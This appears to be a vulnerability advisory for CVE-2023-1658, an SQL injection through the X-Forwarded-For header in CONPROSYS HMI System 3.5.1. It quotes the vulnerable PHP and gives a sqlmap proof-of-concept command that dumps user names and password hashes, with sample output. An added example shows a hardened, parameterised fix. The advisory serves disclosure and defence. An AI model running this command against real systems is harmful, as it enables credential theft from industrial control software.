
CVE-2023-1658

Critical

Description

An SQL injection vulnerability exists in CONPROSYS HMI System (CHS) 3.5.1. An unauthenticated remote attacker can exploit it to enumerate the CHS database.

CHS logs login attempts to the dbo.m_user_login table in the PostgreSQL database:

from: auth_login.php

    $v = d5::v(); // get client IP address
    if ($l != null) {
        $p = ad();
        $q = new d5($i, null, null, 'dbo.m_user_login');
        try {
            $q->_a("_S34_", "'" . $o . "','" . $l . "','" . $v . "','" . $p . "',true," . ($b ? 'true' : 'false'));

It uses the client IP address to fill in the client_ip column in the m_user_login table. The IP address can be taken from an attacker-controlled X-Forwarded-For header:

from: CPostgreSQL.php

    static function v() {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) return $_SERVER['HTTP_X_FORWARDED_FOR'];
        if (isset($_SERVER['REMOTE_ADDR'])) return $_SERVER['REMOTE_ADDR'];
        return '';
    }

The X-Forwarded-For header is not sanitized, allowing SQL injection via a PostgreSQL INSERT statement: the column list and the values are concatenated directly into the SQL text before prepare() is called, so the prepared statement has no bound parameters left to protect.

from: CPostgreSQL.php

    function _a($a, $e) {
        if ($a == null || $a == '' || $e == null || $e == '') {
            $this->a = 'Error: Invalid parameter.';
            return FALSE;
        }
        if ($this->_ == null) {
            if (!$this->k()) return FALSE;
        }
        if ($this->_ == null) {
            $this->a = 'Error: Not connected.';
            return FALSE;
        }
        // $e (the attacker-influenced values) is spliced into the statement text
        $c = 'insert into ' . $this->f . ' (' . $a . ') values (' . $e . ')';
        $_ = FALSE;
        try {
            $d = $this->_->prepare($c);
            $_ = $d->execute();

PoC

The following sqlmap command extracts user names and password hashes from the companys.dbo.s_users table:

    sqlmap -u 'http:///php/login.php' --data='uid=admin&pwd=aaaa&cid=admin&pid=admin&type=admin,user&nname=1&lang=en' --headers="X-Forwarded-For:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa*" --technique=T --level 5 --risk 3 --ignore-code=401 --dbms=PostgreSQL -p 'X-Forwarded-For' --no-cast --drop-set-cookie --dump -D dbo -T s_users -C login_id,login_password

    [1 entry]
    +----------+-------------------------------------------------------------------+
    | login_id | login_password                                                    |
    +----------+-------------------------------------------------------------------+
    | admin    | :a0edf1520405d98745153ca965fb376e62b662d1ae4316ab4af3402e44b859f5 |
    +----------+-------------------------------------------------------------------+
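As an added example (not code from the advisory or from the CONPROSYS product), this is how the login-logging path above would be hardened on both fronts: X-Forwarded-For is only honoured when the request arrives from a known reverse proxy and parses as an IP address, and the logged values reach PostgreSQL as bound parameters instead of being concatenated into the INSERT text. The function names, the trusted-proxy list and every column name except client_ip are assumptions.

```php
<?php
// Added example, not from the advisory or the CONPROSYS code base.
// Assumed: client_ip(), log_login_attempt(), the trusted-proxy list and all
// column names other than client_ip. Needs PDO with the pgsql driver.

// Honour X-Forwarded-For only when the TCP peer is one of our own reverse
// proxies, and only if the value parses as an IP address. Everything else
// falls back to REMOTE_ADDR, so header contents never reach the database.
function client_ip(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    $remote = filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '';
    if (!in_array($remote, $trustedProxies, true) || empty($server['HTTP_X_FORWARDED_FOR'])) {
        return $remote;
    }
    // The header is a comma-separated chain; the rightmost hop is the one our
    // proxy appended, so it is the only one we can vouch for.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    $candidate = end($hops);
    return filter_var($candidate, FILTER_VALIDATE_IP) !== false ? $candidate : $remote;
}

// Parameterised INSERT: column names are fixed in the SQL text and every value
// is bound, so request data cannot change the structure of the statement.
function log_login_attempt(PDO $db, string $company, string $loginId, string $ip, string $agent, bool $ok): void
{
    $stmt = $db->prepare(
        'INSERT INTO dbo.m_user_login (company_id, login_id, client_ip, user_agent, enabled, result) ' .
        'VALUES (:company_id, :login_id, :client_ip, :user_agent, true, :result)'
    );
    $stmt->bindValue(':company_id', $company);
    $stmt->bindValue(':login_id', $loginId);
    $stmt->bindValue(':client_ip', $ip);
    $stmt->bindValue(':user_agent', $agent);
    $stmt->bindValue(':result', $ok, PDO::PARAM_BOOL);
    $stmt->execute();
}

// Constructed request: a direct client (not a trusted proxy) sends a header
// that is not an IP address; client_ip() ignores it and keeps REMOTE_ADDR.
$fakeServer = [
    'REMOTE_ADDR'          => '198.51.100.7',
    'HTTP_X_FORWARDED_FOR' => 'not-an-ip-address',
];
$ip = client_ip($fakeServer, ['10.0.0.1']);
// $db = new PDO('pgsql:host=localhost;dbname=companys', 'chs', 'secret');
// log_login_attempt($db, 'admin', 'admin', $ip, $fakeServer['HTTP_USER_AGENT'] ?? '', false);
```

Rejecting malformed headers at client_ip() also keeps the client_ip column clean for later forensic review, since only real addresses are ever written.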

Details

Published: 2023-03-31

Risk Information

CVSS v2

Base Score: 7.5

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Severity:

CVSS v3

Base Score: 9.8

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Severity: Critical
